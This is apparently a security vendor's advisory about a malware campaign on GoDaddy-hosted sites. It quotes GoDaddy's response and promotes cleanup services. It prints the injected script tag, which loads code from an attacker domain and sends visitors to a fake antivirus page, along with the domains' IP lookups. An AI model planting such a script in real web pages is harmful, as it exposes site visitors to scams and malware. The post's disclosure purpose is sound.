If you thought your problems at GoDaddy were over, well, not yet.
We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.
This is how the script will look like in your pages:
< script src = http://cloudisthebestnow.com/kp.php >
It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.
$ host cloudisthebestnow.com
cloudisthebestnow.com has address 18.104.22.168
$ host losotrana.com
losotrana.com has address 22.214.171.124
A sample of the malware injected in the pages is available here: http://sucuri.net/malware/entry/MW:MROBH:2
If you are one of our customers, our scanner probably alerted you or will do so very soon.
How is this happening?
GoDaddy has some internal vulnerability that is allowing the attackers to upload the following code to their sites: MW:SIPRO:1. A few minutes after this code is uploaded, the attackers run it remotely and this PHP script infects all the files within the site.
Our clean up script still works: Simple Cleanup Solution
Update from GoDaddy:
GoDaddy contacted us and left the following comment:
After the most recent malware attack the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.
The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.
If you believe your website is impacted, please fill out our Security Form, located here: https://www.godaddy.com/community/contactus.aspx?…
Our analysts will review and, if needed, remove the offending material from your website.
Neil Warner, Go Daddy Chief Information Officer
If you are having difficulties getting your site cleanup, send us an email at email@example.com, or visit our site: sucuri.net. We can get your sites cleaned up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.